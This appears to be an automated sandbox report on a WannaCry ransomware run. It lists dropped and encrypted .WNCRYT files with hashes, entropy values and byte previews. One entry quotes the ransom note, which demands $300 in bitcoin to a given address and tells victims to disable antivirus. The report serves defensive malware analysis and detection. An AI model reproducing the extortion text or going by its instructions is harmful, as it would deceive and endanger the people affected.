Preview:	WANACRY!.....s..%x...M..{<J....F.v.t...c..e......}6...b^{.2..)...H\..o.<f.l.QT.F/!Ut./...&.t..1......k.%.!g...]0A...Nz.=.8.8.%.}.y.`...Zk..B..f.... !.jn.2..C.._.r.v:.'8t.A.._7ti0S........QYR.q..e..{{.,8...\;w.<s..o"Z1....]......ed\|.B.eo.00.a.2...g..\|...,w............\|"......9aRj".,X.f+..$...\|>....D...c..b$..Wb;..3......]...^.[Z.^..X... 6.0.....q{...\|,\....aw.}.....E/...+...x...a..;b.....b..E.b'...-P.-.A...Sx..a...H..:/.).Zd.....7.. .(..5'nB.......)+.q.....k(.R2".^.e.5..st,...<.;0.'v.".@.o6#..~\|5...V.6.(.8s...S.c.aw....u..%..3....k...D.@V#z.w..M.k-.@o.B.....g:.....}...4G9..N..CAs....[.y..y...Ph...y.?R .y.a..uXq...?..._td#....){..... .k..../.%I...F.t.pqN........}.....4.......4.%.7j...9....u. T...<...TJKG....X.......0.W.............e.vb.p.0.......54...!.:+#C.g.W2.OI0.6^.........\|....ST1.TSr...r1LAEfs...g..x..P'^.Qf:.. ......q....Sh..`+S.L%..F.n.*3,......H...K.^8y^f..m....D..=..I.r....P.u.q..R...?...bJ./.... .2....&55B...V..C.Z.K..

C:\Users\user\AppData\Local\Intel\CUIPromotions\Images\000000_INTEL.ODYSSEY_ADDITIONAL_GAMEPLAY_ASSET_CUI.2.3-600x300.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	229640
Entropy (8bit):	7.999071931883501
Encrypted:	true
SSDEEP:	6144:1cZn2b/8Yh0UK59gmJt5ttgZf6PtY4SkseU8f5sj:1cZnQ8U0h59gmJtRgGkki
MD5:	64E3C21395E6DB191583765734513CD9
SHA1:	DB45D4954E17EE44CD9186D3D71157B74E635CEC
SHA-256:	D66F8224D0F4C901E75CCDE5FA0E7283D9E5B4843C859DE63079E8A5A5D37B5E
SHA-512:	11EF0FC3F8C693FAF04A6F2BD0F027AC63A53D3B51563D0B93B1150DAE8F07F4F24E037053B3A578DE708BBF7A620A37ED5275440E4430C75331B025565D68C4
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......A}.P.iA.-.v.i....."..!1.U.K.h>.&...K.....`D.X...H.b..0.9..?..my..m..%.<p5#3.j......T.......S..-...r5...5Eg..Tu..6L..E..q..1qj.SAK..(.~75...."Z.~P(....)N..>\|...{kq.>.Y....{....n.f<;.D. K.`....J...... .9...s..PN..#..&......<ep....cT...............B..,r.....p~? 8..5....I..n...B...:..4..\...`9w......H}k.X.....YU.}. ZD"....\h...\.S..R.."g....Y..$x.z.]X...;B:...y.pEH...B...T...Z%'E..0..l..n9.u..ztc..n.KJ.......:...m..a.J..G...(.V.l..G3........?\|....GuY...\|5.C@yx8.?.74....G..{L?.6tA....%.....S..{^.xtxX..Rw.g...`5.u...."H.a5..y.\|./[_..Lk=..i..%...7a..i3.....i..Ky.s.[H...P...C.h{..........e}4x..(._..Y.O.(...l.H:.)a.....T{...m..z..(......{..Kb.($~0.G..[mY.h..}h.TR,....{..0><...Fz.......v..0..>..G....&.3...n......r.......g..-d..?.'......a..'S...u...f.(q.r.............V0Y!..R._.....Q.....:.......A..2.......$1.a-.6..s.[..?}..$W...zhP^...gcc.....&o.....f...seh...l[P4....xIm..m.v..-.[..\C'(.\.9./....O0....=..H.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	16664
Entropy (8bit):	7.988236879633376
Encrypted:	false
SSDEEP:	384:NF9R+HIpInp6vm3Z1PcVXnD6aqYl7deZIdWw8x5ShrI:EISnpSqZ1cdD6aqO7EZIMms
MD5:	7768077030615D3FB33158BCF8189586
SHA1:	EA5AD854A6E4B9EB198E4EFCA8C426AE442B2C68
SHA-256:	12F04080533D1E12C105A9F3819872DDDF7E7F312E3D1F27AD135CBFCDD81419
SHA-512:	1C5E7D04EC1044A1E5B64A64C17A814AE63A8CFFA76838F9D40D680AC0A6C4A2A9550A81AC9205F33591FB17BAA6EB2BBE1C3AA150ADD18B9B7DF957E06CAF78
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....q.}A._7S....dy...n.G.c^g...+...4...s~.j]w..DU3..\|/.\k.....'.....T%...4.g...(J?.i;..g..R....p..B;Z6....AJo.......'.Vy{./...).4D79U...V.>..LP.E]e....w...B.9.S...5T.r./..f.Yr.,&.O..../.w.Bp.B.....u1.^..H3...........J..OK<.....V[..N.('5...F.K.{.....@..........0h..C.QL.<..K..L..d.%...>^j...5..y%lt[&.....+...Ik.....90..../.O..#Dbp.B<..I.f.-G.+..@.dM...!F.!.o+..=......}.^.tw.!.v.......K ......v..?9V~....c.<..{.$-.hVb.(.y..z.{.a.._....7... FLu...r#.BD^.....K...F..(..J..2j(..i.~....v..h.....NdS`.$.O-UAG.o..Q..h......jo.r..Y.EN..7&#$...j....kC't...p...t:..<..~M.PLPt.A..,.\|^R[.~.6{J.?.h-.M.p...mZT.<k..%..N.:........p.e\.h..rE.^H...oX.V....#.?...]3..W.I..C..Il?..mA..a&h......3..8....+..P..... .N.S4..}...<..M.8....3M]~^_......?."..&\|'M....S.......F.=.K..\.T....7.fS...oV....0...X[..pn...To..B.G. ].8:,{.i..#~..u2q0%+!.......a.g..(w..9."=j%.%..)C. .e.,Y...#R....,..Q.qq..t..J...N*^.._c'r...SX...&.......fa...B....9Ym..f(..C.p...-.....9..wf!.F

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.9956300850934445
Encrypted:	true
SSDEEP:	768:gJp4pUi+yxOKJEgAcxrmRs4Hgt0D19xwVGmLfJJqv8D9IvFpODZLfwrwyU0ymcAe:gXiUHXL6xt0R9OVBLRMkD6+9Lfw3ywe
MD5:	6D09C4CB2C0024789BA7DDFD99608068
SHA1:	C693B44CB29D5B4B63C0F3AE42E6F4D5A7B54B2A
SHA-256:	9D8094B168766FF668E63A8AF7DC1E0B69D10920C031FCDC49F76D537999833F
SHA-512:	A8D8AEBDE9E6D36D139D9C182BF16A721409B976F9A3626BF935B86BAEFD18263E00C22E3E36C97626461476F5DADFA0A61513DAC9D713990DF3EE14813F51A5
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....;...zhrjm.n...e\..6.....y..xj.2...]xc.....l(.\|e.F.&.."O(k..Z...V..AG....W.DE.D.CS$eV.8.F...K.9.. ...Q..S..xX....S...62.E..U=i4...W/..jJ!.Z..M.....J..^..3..3D.K.UN!^o.......I....?.&....B..EAz.....`.....)./...A......Q.R.)g.....C.0V6.sq..e.\|...............a..I.."....B5H..%@8..;..n...y.G...f# .n..j9.=......+....:'0F.iv.x.zj..4.O<.$.v........g....u..!.6...A.......>......$..I..7...t.j.N..Tn.v.].s8.d9-F.A.DN.\|..#.\..;..Hu....z....~7..w.p....m..#1.dE!.&./..e....YP"........=..hT..y..m\|V%.U9....Z..B..pr..E...#J.Wp.l:.f.7.7..:..E..Ov..d~S./80.1l....\|+.._..k.#.!...f..]...H..,T{...6q:..Yr......,...[..C.y.. ..;8.......B....Z.[.......I.........<..@t.x".a.uvY.....7..U....P.....Rj....s..QS.V.\|.1..+.e%..........+..C...u?.G..XD....Z....FlK.......t..A.u..bn..#.F-3.....:.lJzQ..Q..{....}Y.d..z...ue[....U.3#....Kh..9..Kq............\...`..;...s+B-...&.}.0:...ow.....=}SW...md.....E...@.K.I.....4I..h.8.-v..T....%....Iu....16...@..y....y.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.1580018778742485
Encrypted:	false
SSDEEP:	6:bkEv6JkewFZVzQIoD1YrorUcQnXZnKbHF3PSpa4obbMN+dRIeILXS/muQbn:bkEvckdFPUIoJW1KblUrYwS/Zw
MD5:	F091EFA69F45918618D959AC55991B7B
SHA1:	6B52924EE3AEF0D2F769FC348352FEEDDD7F994B
SHA-256:	53400152C5EB9869326E39B80718980D58A4E78D8B5E2F09879CC289E023D402
SHA-512:	B3368C8204F3070BA3B6E7E5E3BEC425F66A41A5F9AB9F9A6203C9AE1CE1454154FF1D20953B13B62ACD3A9EBAEEAEC88EB028BAB6A343648CC86B9F5FDE7BE7
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....5..(0/..;gg.:.L...........=a6...$..m+.s\|j5.q\.+.........m.VH..4.L<...g..g#v>.:..;.Q.Sqb@.@....Hz.~...\|...Z....9{f.y.m..W..'.`_.8-5.H..;.S}&_....>`,Pu_n..b:..R...,.~E....=~...y...6.8Q._..A..l/.\...e........~.....}:m4>.....O......:h?....T..z]~............mo%.H..1.x.....

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6776
Entropy (8bit):	7.973342116127765
Encrypted:	false
SSDEEP:	192:7MoUUxod6RzA5r7S6MICCNxpAJQBkILws:7MormwA17xzBAKbUs
MD5:	3EC5215931274213F8B02F9168FA9353
SHA1:	0B50967C772D82E679DAEC2B819ABA19E29B32B3
SHA-256:	5772164FC3F596C0D4615BA0CCB770CF2E98AF663FF91BC599351F3C140A4247
SHA-512:	9EE179A35D20026BB4A8FCDCA15DAF92455025515AD9BCC2B54A9E87541C5D4012BAB9A51C6E38A66DAC164CAA9D48E63506286B5E9E6D503A8740BC8127F310
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....b..Y...kV..).7......+.....K..r...3a. .t.....9L."..'..?...s..F....S.D,>nFm.b6.C.(=.V.HG..F..Y.:...>L..;L..H.,^.FG/!x..(.._....(.....8.x.G.D..Cp@4b.....PR....&_vFn'..n#fI.;.."W.....w. .c.^...y..e.22...\...0..^I2.........D.J-.%QD.....b......f...~....`..........-G.....[..O.?l.9.....<.L...-......@.b..a...sq......4F..+G77.....Y.I..N4L..gq....<.....fv...GX....[.2.W.J.N.^@./..J..g.....:.\|R.7,....I.j.D.i~...b.Jg[GW].^..[Oy....G.G.......9.W#".C.z.NI..+........4.vc.}....k.....\.../....U#C..(=.R.'...m.)].1.mE....P.A5/5.Tc.(bH.'..o.T..+;.....Z_>@.g. Jo....xX.m..Y_..d.. .s...G.L$..W.....+d..f.[a....:~RR..Dr..@.+...F.4u..#....c+.5-j....g.A.q.Ys..^...:......nY......-..>..r..\|.)....Y..5,......B....9..H...[.%].12..]s......awR..X...w..8.. F"..0l...u..u.!..$.9.X..L.th...D...e.(....V'.~4...e.@..f.sA...o..h =mU.D.Z6.4.#B......Q..M.............P&..S`.(.....#..o@.b....J....S..s.....@H9..(.p.~ Fd..7..ov..A..........5........~@..7S.b...H_.x.0........w!...

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4664
Entropy (8bit):	7.96284093424494
Encrypted:	false
SSDEEP:	96:o0G6xBl8JnavYn4k1orD5t1+QVFVr8H9bAGK8XUubfBFMUhuCfjT:TgJawn4NrD53+QTVr8dbAX8XU2ZVU+f
MD5:	18E6C66DB17BB24E15A58B765158CAB8
SHA1:	270AEEDADA83464D126B78BF88709543C7712764
SHA-256:	98A69D453263A1409D28AFAAACAF2152D7AD5D249A2A7C5ECFE6061BF76C61BE
SHA-512:	FF246B92C0487C82429484006B163034C7B6914EB4FB8DEE35C83F7401B39781D409A75C09AFCB4A0F5CCBB19A3BE6B06AE457ED969629A336106FBE45FBAFA8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......`.....E.R..y..tn...0\y....hH.Sl......f.......&..~..q......Tt.w:c..;.0.h..%....h\Io.....=rf.....N T.P......U.;./.$....W...........g...........~(.......S....CR..6..^X...>].KI.9...E.L..a..S..=..E..1!.k0..> .JK.....k0=".Rs...\|.B.LK(.....x...................^w!)w.cwj._m`.....>+....[..^.)..}..Wa.M.<.p..4DAi.M..4.../...B...E..}oM1...umG.!.Z1........6..e.....w.oY?..A..k..Me.W4.mt..\|.~.q...T,..a.i.%..9....~/{V....P.....7.6o....<d.:...IhNu$.}.....&b....)mH...~C.2.)h..Z..eB.A...+..P......&.5l...>a.....u.Ah..S4&^.K....m.V..C....SF..Y.}..Z~.....S.r!....q$..b.m.../.....%({6......nFn.O............p.........&D+}.6.y-......G.e.t.j7..4%.={_..Qn.]$r..2..S.....'MVr.i..!.....E.~^.}:....-.....l......:...$3.......K..H......^jk.-.....\....4.fe8\|\|....S..5..D.......l.Bq.J.....I~.zC0].....z.t.t..g5.........8^.]..^...>..4.z.w.j8.D....g..O._....E..U....\|..ER..?..g.KY...c..V$..lm.7..P.WU...I&..i27..^.......~..r.....M.0.+P......Sq..........G.;..X..`.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{038DC840-BEFD-4EDF-A537-D206F96DC1A1}mt11414620.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	8616
Entropy (8bit):	7.979854242477725
Encrypted:	false
SSDEEP:	192:elbTlsYyez5faAy/hvFVG6BCSkpwwcpDMHN2ZzhseuT:GTlq0iAyJ9MCkpKpMP9
MD5:	1DCD57737F1443E168B5D0F8C9FEE1AC
SHA1:	DAA7D3BCD41EE5C41F49A53668F7712AAA4CCEE4
SHA-256:	8D82939BDCD2AD0874BC2432BAAE4D3336ED7666B7D322D8CF361120162C972F
SHA-512:	1E447F3332E78E1A487881CE3AF49A497087780D894A869E1F8865371BEA673682E8C3085DC8CD78D658CBA827DFE6C86201D432189DF3855CCA3ACBB2FD53BE
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......(.]ru32..M..L..R....6....F..Ki:........@...<FvV.I.%.yMc..}Z2a...7..V..pN.6.6..S..>.q..0..n;dd...3.?.........X.7...!W..'.,.g..7.6.].\|...?."..........\.<.Z!......R..;C3.=.....8!...5....j.n..Sr...D}hf..u.Z.....Y...J...z/....3np(.R4`..H;.I..d....... .........}u.(...2..%q..Vf..0...7R..p....4.E^w..YP..;.1...i.:.D\$..!#..g7..c./..A.....]....>..Lp.:m.......p..4.#..C. _..<....u......4..;..sPV..^.p....#7=..r\|...a.@..y(...K4...0.V......d.c...^.bc-....J....&..Z....:=.i_..[Y...o.}..,c.'....PE,.....0"...0...!. .....p..1h.jZhQ=......F..~<...f.Fq.@..{...~(X.......>.9..`.y...t....,.`.....=.......E...o[t.[....WMB. .....b..lC...MI...~.U..w...y..[.%...f....Ck=.`.-.{..."f.,............!.7...~.. ...A..=....N.`....1~F.I9y.&....,...J3/..`j.ZG.D.....-..U.?o{..b.E.......TU..........R....#...:.."W.]^..#.......f.5.9..;a.....{....1...1....}_b..h..b..rgA:.G*P.$B..X..og;L..H.z..{..#f..H..X7...Z.PY..D;XT.z..x.M.y.WU...D@......S....;D..Iu..<..VX&....

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{2C3729F5-6B1A-4F06-B77C-2AB41C959EB6}mt11829122.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	14408
Entropy (8bit):	7.988123287950955
Encrypted:	false
SSDEEP:	384:prqOpA8mAPgXfZ8hqwlEA9tWv+3bgGLwvwnNzxyj/b0CEgMYmLE:pmOplHofZ8cwlEGP07yNzYb0m/mw
MD5:	E57E60E01152AC43DDA1CCCD41B38A76
SHA1:	A20DAC71B518471D02E86B6A3454F68BEA74BB1C
SHA-256:	999E0DCEC58DC74D61C1D7E32B70DC7FE21DC0922A97A3A3F43847AF8B6E4866
SHA-512:	B3D833447E0FAF1CA78F930E722649AAE0D1A3D3311465C9A16B008733A0D5276C8870801B64E821D52C9700E14B74237178147569C5E38E4C7335C58AA46D63
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....AJ......Z_.....R..>.z.m.\|...:S..n.....f......s.dY....=...,m .5.6Z.5 ...%.\..(.y.....&........e..$....g.....kZ.....IZ=6.V.D..M..w.ca.r.....,.8<....R.g8..z`.^7....}.R..?.?..M....Z...)X..r\|.4..mcO.<C...x.=.%.H.!....:.~UJ6-........%.v...K....35..S......+7........./.U..9..W...k.T...BlP.ahw..%3..8..D.....J..Ja..W......-G.X.._-,#..B].C..k..8U...C..\|v.. ...5t.gg..MT.e.8.K..n@Y.@...5.VDd.;....`.}.._....wGr......6&...Z..=Hya..\|.....0.x=vv.:....tX.F)L"y..}.E.K.VK......,......8..=w......{t..L....Z..$.f.:..~..0..%!...F...y.R/...)...j..A..3n.J...rifW.'.NY.d..?..C.1...;.2$.0.".J_.t2.;...)..c3GWL....`...{K.E...9^...P..!..&[.0..f..+.W.R.p.L....3m.......'.ZU.%c.z..`%.u.....\....z.a....N..8(s... C.b-..W..&..c...(.So.V....6.<.;H[.'...h. ._If.f.e;...t....D.Vm.[.(n...1.@...L..).Q?....MHj...I{...1.B....k..z........=.OR..{K.F]Ae0pm.N..U.-...x....q.P......R....X.`i.T.F..=.$.0+c(Q9.C..&b.Q a.......D...dl..4{.j.3".N.2...n..Y..!.S....0Jh..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{8E108E7E-651B-4D15-9446-304CDAAB8AF9}mt10000137.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5240
Entropy (8bit):	7.968308544029727
Encrypted:	false
SSDEEP:	96:o5S4y7871nNtsDQIjeAgZoOs/2XQhMC99Pa2aoYxD4sX6fgZTj3ypEqi:PzYpMjcZNs/2X6DmhQg9+pEz
MD5:	B21D188D5641B5A9097006635C783AB9
SHA1:	6884C10806747C5020D09BD6689F8912C85CEBA4
SHA-256:	611A174882074B19DF13B17AED17A742A52C9BEB20D809D26F99C3021A1607B4
SHA-512:	63E2674DADADA3DD3B6A28A13B2326F8BCDA8E01C4E20FCF921C8EAB912926E0E21067947DF545DD909E57F4199CF6D7F94936D309FE8041FF2473CD95931525
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......u..../...L .....Y..-.H_.....+..D...E....3.T.H...u.......#.....-.#....._b w...T....G.".l.I.....j\...Dz?.C..\..!O.[..=c.gb.......v..c......F..Lj;c.........$:........)>R.....+.fZ.@..r.XI.9...b.:.V.NSZ...\.)...j...5.[...26;......Q0FV...+?...._..........Q....$...9A.H..2.i..0}c..N.:X@.:..%........u.z:...Ce..._....%..u{:R...S'..:j.........x=M...+.=.<C..t..R..^i.?.W&....S..I...h.....ER.O....-.....+....).gW/~.4._..u....}..".2...F..?v..@.>.q.,.o.......r8..S...E.......2_.}.7R...z.*/]..v.....9....K...#..Ro..`(..yw...~..lNM.}..:.N....../..p..k5..p24.{8G.P....\|c.4X.......,....9.$s..z.tsr....#..wA..v>....5JX..5..R..T.w.........5t.+...,.q...X^....K.........Ah.j.......w.....?.L..Z.tH.....n..St......y..................1wD...y......\L.Qu........X.~.V...7LZx..:...\....W..o....IlS...'..J....S!..z.t.U-yCI.U.....]...l......~.i.!. .{b.o.m+.{..8..X.[P...q.{&.5.G .L...v\P..........t(.q.O(.D.@H.7..P..4SK6..'.e..E../.v......Z..PUt

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{920EC2BC-61C3-40DF-86C2-1E647F210A9F}mt16400647.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7384
Entropy (8bit):	7.971695889129268
Encrypted:	false
SSDEEP:	192:3dwfhL5JkUNYL/fof8WM0pIXqfzDs8dxNqpBLC:3d6zJkCY7igJqLDskx8LC
MD5:	FBBD22ACD53B27FE464CE1D91C485702
SHA1:	008F88B6893AEBFC7C5A5B7D667FD2C0C440C309
SHA-256:	DA751ECBE05DC335EE67CD176E9E1D2AAF60D89CF1F47D1EE3C26147AEC55FAB
SHA-512:	96144FE338BE1821E81AEFC55625FFB460CBB1B6C21A388EC618F930FB4BFCAD51DA5A5919EFA08AC8F289E844F5A2971E9BD18FD549D433591AAF8C5BA4A7E3
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....4..X...1.A.V..EN..~...r.h...R.@.g.)..i..O/e8../<....#\|l-7z.kz...L.l..s.k...<...\...RT.#....CQ1..1.'....s:J...../.-\|...G`..tKsg...k.HK......C.yZ..;X"7...+w.H...#..'c.$9ku..31.P..o.8....^..`.<....[.....d...0Z.S......1...oh..q..P.L..."....g...e`.x...............%..]d... ...2...g..=>...._.....9.{@......y.p...th2!.!.....?...t.#..2oWv..g...G....V.H9+Y7./.^t.o"..J\.....Q.....k.....^.f&ip ....a...u..).~.02....ZK...-.&.wt%..x....R?n1.....t....0........:.}.U....D]nk@S..\;.....eXW..L.q..e.......#.l.w......P.....E.b...W..KM!.F ..2..5Pi<..DIR1....g\..$.X....3..(.e..(q.{.yhI.l.J.........:.....5H.fTR.....}-A.4.\|...>..u?..'=...o......p.Z........)6>..Zf....j...JK.V.....T...}......V`..K..:.e......@....P....V%.--....U...?_bi....l@1;@t....J..A. ..Kbr.^.n.d..=r..%....o.\..FF..-.r.H.<6..mo.n@7RU!.^JH.`..DX..9.u.kJY.y.9C..bX.0.=<)MRz. ....82.m.......9U..EU+.N6......sEA1%....)...(@.....L......(.w..l!#NN.``Q.r..O4..oS...f.^.._J.y7g.?.U?.)=.8.FGw.z...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{A26B3E48-AE08-4429-A0F3-46650603BDAD}mt67739505.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	9032
Entropy (8bit):	7.979310633087339
Encrypted:	false
SSDEEP:	192:0G3Z2x2misZXLp43W2vozNgHZpD4Ju4Zz/PWfcLaylI6j0Ql3KZiVXa9zzZmDD9T:D7miMdSHugHMc4ZzWfuI9QlaZiJa93E1
MD5:	B8F326E226761F002406E13F9F7DBFEE
SHA1:	BA5C34173AC9D4282AC238488B42E66F8758E495
SHA-256:	235C8289339EFDAE99735E42B0491589CE3B4202D891024AA655E49F3035119E
SHA-512:	7F30F9C56C75F74C4FFA592184B186726E4095C576E9FF4C0925FF9BAF6D6E8EFF8948375DC7CAD355B261E91EF3F7B26ABD23AAAADB579A57B0EF9202B25F27
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....x..&.'..Z.....h.z.#....{....).+..9.u..C.PF....]..J...1..W8....\|ZF+.S8.W-=$N."\B.....1.P.1kc...~..P3..\|.m..6..L.r.....W.I.?.........1.9..~z.....=BfG.3.C........f...Z...vr.M..b1.(.#_..u>e....@.y......>..>..-.r\|.#_O..\p[.....t...@..[.h8.&i....h......".......G1.B..!....0..x8.U......t....W...=........l..n.C.@...Sn...[O.....).0.Q..%k......l.lk....5.5.:..W`(...Zn.\|eL.9...L...=Y..1..]:.Q.g.c..6d...l.X!%@.B....$..@bQ.[..(3....S.:d./x..=.z_5.....=+S... C4...D..e..&.DiM..!......YGsuw..D....U..1si.ms.@..M.j..._...6.........Q9.7........o......l.. {j..ny....Q.....7..M..t........O..)....d...6.N...ab....-\....\|H.......s.S..v.v?....3....C.L..M./.t:...#....d.,.L, 3.a.ZD...`.,e,.n~.^K..X..9...s..@..F.>D.....\.a..{p.....&...C(..N./A<..:h...c...D8...G..i.6J). m...r.[....B&.C6.?.m...i*.....v.@.!..I.....+j..4.0.;...........C.....6.H....].."..s......nH......_..rs......._....PK...EH...I.z......+Q.$..bI.CP\.v....b..1.R.:s..;..$..{.<..........:...;/).

C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-US{BBE0BDBE-F41F-4225-8E17-87C64C39622B}\{B1076C7E-1A13-46D9-84EB-4CAAC5C83618}mt66963475.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7960
Entropy (8bit):	7.978112024680564
Encrypted:	false
SSDEEP:	96:oPbAWB/q+skLwncZcpUhd5QCduoVcLtKYTe+qFg6SLUGceMbQV7SmtYqQ2MjNvP4:GH8358ea8tdToV/XUJSmiqQx5SjNFwi
MD5:	AD86D9132485F6417B03A9B36D27442D
SHA1:	CF597CD1D78A89247483FAA4D16732BF17E24104
SHA-256:	FDDA968355C3DC3183C603DBFA18188C13544C7A481E799436FF94E3E2487F88
SHA-512:	23BB83DF8DC6E45010EF8A1FCF28801CFF0835AF90389ED67653DE98E8E4517DEB98F1DE84775B83E04BB1DA1D0A85E566AF6BDAA9DCA995567D58E06AD60BA8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....O.`R.wlF.O#w.+\|..mz...e_..YR.i..}^.V..B.....a...uA....;.s....W...P.}...K...(!.......W...G.<2./h..m.......SrG..6...s:......5p..D....f%.X.......t.9M....?W..+i$.S<w.........c9E.mIU.(......Y.._..#...)}.L.:a.....~*p X.._`ZWD..)..p..Cp.Er....b.y...............k.M.`=..#....:.......2..I..c.m.S.4w. q........}D;...XJq-.@..m...yO.......\.....6..{.........e.u...e8........M.?...E..x'.g)..F.aS4.=....6.p....../.LV>.J/.,..8......U.O.....8y.6v.\|..h0re.@....9.G.S.@....Y.C......c........0..q............pJ.[....A.&.....v./S.\|...2.q5>.7...?'.......;MN.hr......LD._3HO.........~ES..$..7/....8.(......6...D....E.<...........VB..^..<<.I\|...Z..Pw.{./T...u?Y....L......3_K....\|B.0U.[{}QX...E........).m..e\|....0...6...R)..O..\K~#.....n...^7..fH..........I1J6.V[.J...(.k<..aE'...Meb<~.M_.o..4/.92..n.=. @.....9:.:E...d....=...Z.'.Z....\|....O;:..e.AZ...[....%.G.....+.)Cnv..2.R...f...N..-.f.4....9..ht+.?.+.oqPU./c.F.y....q.?...In.S..[...^.T$....mE.g...../!...1X

